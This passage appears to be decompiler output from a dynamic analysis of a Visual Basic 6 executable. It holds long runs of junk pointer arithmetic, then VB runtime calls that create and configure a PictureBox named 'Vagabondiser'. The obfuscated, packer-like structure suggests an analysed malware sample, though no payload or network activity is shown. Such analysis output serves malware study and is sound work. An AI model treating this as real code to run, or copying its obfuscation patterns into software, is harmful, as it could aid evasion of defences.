        					 *_t1660 =  *_t1660 + 0x52;
        					 *_t1242 =  *_t1242 + 0x52;
        					asm("adc eax, [eax]");
        					 *_t1242 =  *_t1242 + 0x52;
        					 *((intOrPtr*)(_t1660 +  &_a196672)) =  *((intOrPtr*)(_t1660 +  &_a196672)) + _t1773;
        					_t1243 = _t1242 +  *_t1242;
        					 *_t1243 =  *_t1243 + 0x52;
        					 *_t1243 =  *_t1243 + 0x52;
        					 *_t1243 =  *_t1243 + 0x52;
        					 *_t1243 =  *_t1243 + 0x52;
        					_t1245 = _t1243 - 0x24 + 1;
        					 *((intOrPtr*)(_t1245 + 0x2552)) =  *((intOrPtr*)(_t1245 + 0x2552)) + _t1773;
        					_t1246 = _t1245 - 0x40;
        					 *_t1660 =  *_t1660 + 0x52;
        					 *_t1660 =  *_t1660 + 0x52;
        					_v1308606428 = _v1308606428 + _t1246;
        					 *((intOrPtr*)(_t1778 - 0x26ffbfdc)) =  *((intOrPtr*)(_t1778 - 0x26ffbfdc)) + _t1660;
        					_t1661 = _t1660 + _t1773;
        					_t1249 = _t1246 & 0x40;
        					 *_t1249 =  *_t1249 + 0x52;
        					_t1253 = (_t1249 & 0x24980040) + 0x00000001 + _t1667 & 0x00000040;
        					_t1774 = _t1773 + _t1253;
        					_t1254 = _t1253 & 0x00000040;
        					 *_t1254 =  *_t1254 + 0x52;
        					 *_t1254 =  *_t1254 + 0x52;
        					ds = _t1242;
        					_t1256 = _t1254 + _t1667 + 1;
        					 *((intOrPtr*)(_t1778 + _t1661 + 0x40)) =  *((intOrPtr*)(_t1778 + _t1661 + 0x40)) + _t1667;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *((intOrPtr*)(_t1256 + 0x4024)) =  *((intOrPtr*)(_t1256 + 0x4024)) + _t1774;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + 0x52;
        					 *_t1256 =  *_t1256 + _t1774;
        					_t1257 = _t1256 + 1;
        					 *((intOrPtr*)(_t1778 + _t1661 + 0x40)) =  *((intOrPtr*)(_t1778 + _t1661 + 0x40)) + _t1667;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + 0x52;
        					 *_t1257 =  *_t1257 + _t1661;
        					_t1258 = _t1257 + 1;
        					 *((intOrPtr*)(_t1778 + _t1661 + 0x40)) =  *((intOrPtr*)(_t1778 + _t1661 + 0x40)) + _t1667;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *((intOrPtr*)(_t1258 + 0x40)) =  *((intOrPtr*)(_t1258 + 0x40)) + _t1258;
        					 *((intOrPtr*)(_t1778 + _t1661 + 0x40)) =  *((intOrPtr*)(_t1778 + _t1661 + 0x40)) + _t1667;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *_t1258 =  *_t1258 + 0x52;
        					 *((intOrPtr*)(_t1258 + 0x1f6c0040)) =  *((intOrPtr*)(_t1258 + 0x1f6c0040)) + _t1667;
        					_t1259 = _t1258 + 1;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *_t1259 =  *_t1259 + 0x52;
        					 *((intOrPtr*)(_t1259 + 0x1f6c0040)) =  *((intOrPtr*)(_t1259 + 0x1f6c0040)) + _t1774;
        					_t1260 = _t1259 + 1;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					 *_t1260 =  *_t1260 + 0x52;
        					_t1261 = _t1260 + _t1661;
        					 *_t1261 =  *_t1261 & 0x00000052;
        					asm("insb");
        					ds = _t1773;
        					_t1262 =  &(_t1261[0]);
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1262 =  *_t1262 + 0x52;
        					 *_t1667 =  *_t1667 + 0x52;
        					_t1263 =  &(_t1262[0]);
        					 *((intOrPtr*)(_t1778 + _t1661 + 0x40)) =  *((intOrPtr*)(_t1778 + _t1661 + 0x40)) + _t1667;
        					 *((intOrPtr*)(_t1788 - 0x63ffbfed)) =  *((intOrPtr*)(_t1788 - 0x63ffbfed)) + _t1774;
        					asm("adc eax, [eax]");
        					 *0x4013 = 0x52;
        					asm("adc eax, [eax]");
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 =  *_t1263 + 0x52;
        					 *_t1263 = _t1263 +  *_t1263;
        					_a19 = _a19 - 0x33;
        					_t1802 = _t1811;
        					_t1812 = _t1811 - 0xc;
        					 *[fs:0x0] = _t1812;
        					L00401240();
        					_v1 = _t1812;
        					_a3 = 0x401158;
        					_a7 = _a19 & 0x00000001;
        					_a19 = _a19 & 0xfffffffe;
        					 *((intOrPtr*)( *_a19 + 4))(_a19, _t1778, _t1788, _t1661,  *[fs:0x0], 0x401246, _t1801);
        					_v121 = L"VB.PictureBox";
        					_v129 = 8;
        					_v153 = L"Vagabondiser";
        					_v161 = 8;
        					_t1276 =  *((intOrPtr*)( *_a19 + 0x218))(_a19,  &_v69);
        					asm("fclex");
        					_v225 = _t1276;
        					if(_v225 >= 0) {
        						_v308 = _v308 & 0x00000000;
        					} else {
        						_push(0x218);
        						_push(0x402aa8);
        						_push(_a4);
        						_push(_v240);
        						L0040137E();
        						_v308 = _t1276;
        					}
        					_push(0x10);
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(2);
        					_push(L"Add");
        					_push(_v84);
        					_t1279 =  &_v112;
        					_push(_t1279); // executed
        					L00401384(); // executed
        					_t1813 = _t1812 + 0x30;
        					_push(_t1279);
        					L0040138A();
        					_push(_t1279);
        					_push( &_v68);
        					L00401390();
        					L00401378();
        					L00401372();
        					_v136 = 0x350;
        					_v144 = 2;
        					_push(0x10);
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push( &M00402CA8);
        					_push(_v68);
        					L0040136C();
        					if( *0x40e010 != 0) {
        						_v312 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v312 = 0x40e010;
        					}
        					_t1285 =  &_v84;
        					L00401366();
        					_v240 = _t1285;
        					_t1289 =  *((intOrPtr*)( *_v240 + 0x110))(_v240,  &_v196, _t1285,  *((intOrPtr*)( *((intOrPtr*)( *_v312)) + 0x304))( *_v312));
        					asm("fclex");
        					_v244 = _t1289;
        					if(_v244 >= 0) {
        						_v316 = _v316 & 0x00000000;
        					} else {
        						_push(0x110);
        						_push(0x402cb4);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v316 = _t1289;
        					}
        					_v136 = _v196;
        					_v144 = 2;
        					_push(0x10);
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push("Top");
        					_push(_v68);
        					L0040136C();
        					L00401378();
        					_v136 = _v136 | 0xffffffff;
        					_v144 = 0xb;
        					_push(0x10);
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(L"Visible");
        					_push(_v68);
        					L0040136C();
        					_v136 = _v136 | 0xffffffff;
        					_v144 = 0x800b;
        					_push(0);
        					_push(L"Enabled");
        					_push(_v68);
        					_t1293 =  &_v112;
        					_push(_t1293);
        					L00401384();
        					_t1814 = _t1813 + 0x10;
        					_push(_t1293);
        					_t1294 =  &_v144;
        					_push(_t1294);
        					L0040135A();
        					_v240 = _t1294;
        					L00401372();
        					if(_v240 != 0) {
        						if( *0x40eb0c != 0) {
        							_v320 = 0x40eb0c;
        						} else {
        							_push(0x40eb0c);
        							_push(0x402d0c);
        							L00401360();
        							_v320 = 0x40eb0c;
        						}
        						_v240 =  *_v320;
        						_t1624 =  *((intOrPtr*)( *_v240 + 0x1c))(_v240,  &_v84);
        						asm("fclex");
        						_v244 = _t1624;
        						if(_v244 >= 0) {
        							_v324 = _v324 & 0x00000000;
        						} else {
        							_push(0x1c);
        							_push(0x402cfc);
        							_push(_v240);
        							_push(_v244);
        							L0040137E();
        							_v324 = _t1624;
        						}
        						_v248 = _v84;
        						_t1628 =  *((intOrPtr*)( *_v248 + 0x50))(_v248);
        						asm("fclex");
        						_v252 = _t1628;
        						if(_v252 >= 0) {
        							_v328 = _v328 & 0x00000000;
        						} else {
        							_push(0x50);
        							_push(0x402d1c);
        							_push(_v248);
        							_push(_v252);
        							L0040137E();
        							_v328 = _t1628;
        						}
        						L00401378();
        					}
        					if( *0x40e010 != 0) {
        						_v332 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v332 = 0x40e010;
        					}
        					_t1299 =  &_v84;
        					L00401366();
        					_v240 = _t1299;
        					_t1303 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v196, _t1299,  *((intOrPtr*)( *((intOrPtr*)( *_v332)) + 0x314))( *_v332));
        					asm("fclex");
        					_v244 = _t1303;
        					if(_v244 >= 0) {
        						_v336 = _v336 & 0x00000000;
        					} else {
        						_push(0x160);
        						_push(0x402d2c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v336 = _t1303;
        					}
        					_v200 = 0x43ed;
        					_v104 = 0xd200;
        					_v112 = 3;
        					_t1308 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v112,  &_v200, _v196);
        					_v248 = _t1308;
        					if(_v248 >= 0) {
        						_v340 = _v340 & 0x00000000;
        					} else {
        						_push(0x6f8);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v248);
        						L0040137E();
        						_v340 = _t1308;
        					}
        					L00401378();
        					L00401372();
        					if( *0x40e010 != 0) {
        						_v344 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v344 = 0x40e010;
        					}
        					_t1682 =  *((intOrPtr*)( *_v344));
        					_t1312 =  &_v84;
        					L00401366();
        					_v240 = _t1312;
        					_t1316 =  *((intOrPtr*)( *_v240 + 0x50))(_v240,  &_v80, _t1312,  *((intOrPtr*)(_t1682 + 0x300))( *_v344));
        					asm("fclex");
        					_v244 = _t1316;
        					if(_v244 >= 0) {
        						_v348 = _v348 & 0x00000000;
        					} else {
        						_push(0x50);
        						_push(0x402cb4);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v348 = _t1316;
        					}
        					_v228 = 0x24ef09a0;
        					_v224 = 0x5af6;
        					_v120 = 0x1ffaec;
        					_v128 = 3;
        					_v204 =  *0x401154;
        					_v284 = _v80;
        					_v80 = _v80 & 0x00000000;
        					_v104 = _v284;
        					_v112 = 8;
        					_v220 = 0x9430efd0;
        					_v216 = 0x5b01;
        					 *_t1814 =  *0x401150;
        					_v153 =  *0x401148;
        					_t1327 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v220,  &_v112, _t1682, _t1682,  &_v204,  &_v128, _t1682,  &_v228, 0x43b490,  &_v196);
        					_v248 = _t1327;
        					if(_v248 >= 0) {
        						_v352 = _v352 & 0x00000000;
        					} else {
        						_push(0x6fc);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v248);
        						L0040137E();
        						_v352 = _t1327;
        					}
        					_v40 = _v196;
        					L00401378();
        					L00401354();
        					_t1815 = _t1814 + 0xc;
        					_t1334 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v196, 2,  &_v112,  &_v128);
        					_v240 = _t1334;
        					if(_v240 >= 0) {
        						_v356 = _v356 & 0x00000000;
        					} else {
        						_push(0x700);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v240);
        						L0040137E();
        						_v356 = _t1334;
        					}
        					_v32 = _v196;
        					if( *0x40e010 != 0) {
        						_v360 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v360 = 0x40e010;
        					}
        					_t1686 =  *((intOrPtr*)( *_v360));
        					_t1339 =  &_v84;
        					L00401366();
        					_v240 = _t1339;
        					_t1343 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v204, _t1339,  *((intOrPtr*)(_t1686 + 0x310))( *_v360));
        					asm("fclex");
        					_v244 = _t1343;
        					if(_v244 >= 0) {
        						_v364 = _v364 & 0x00000000;
        					} else {
        						_push(0x160);
        						_push(0x402d3c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v364 = _t1343;
        					}
        					_v208 =  *0x401140;
        					_v136 = _v204;
        					_v144 = 3;
        					_v220 =  *0x401138;
        					 *_t1815 =  *0x401130;
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220, 0x10, 0x55ed, _t1686, _t1686, 0xd890ffc0, 0x5b07,  &_v208,  &_v112);
        					L0040134E();
        					L00401378();
        					if( *0x40e010 != 0) {
        						_v368 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v368 = 0x40e010;
        					}
        					_t1355 =  &_v84;
        					L00401366();
        					_v240 = _t1355;
        					_t1359 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v196, _t1355,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x308))( *_v368));
        					asm("fclex");
        					_v244 = _t1359;
        					if(_v244 >= 0) {
        						_v372 = _v372 & 0x00000000;
        					} else {
        						_push(0x158);
        						_push(0x402d4c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v372 = _t1359;
        					}
        					if( *0x40e010 != 0) {
        						_v376 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v376 = 0x40e010;
        					}
        					_t1363 =  &_v88;
        					L00401366();
        					_v248 = _t1363;
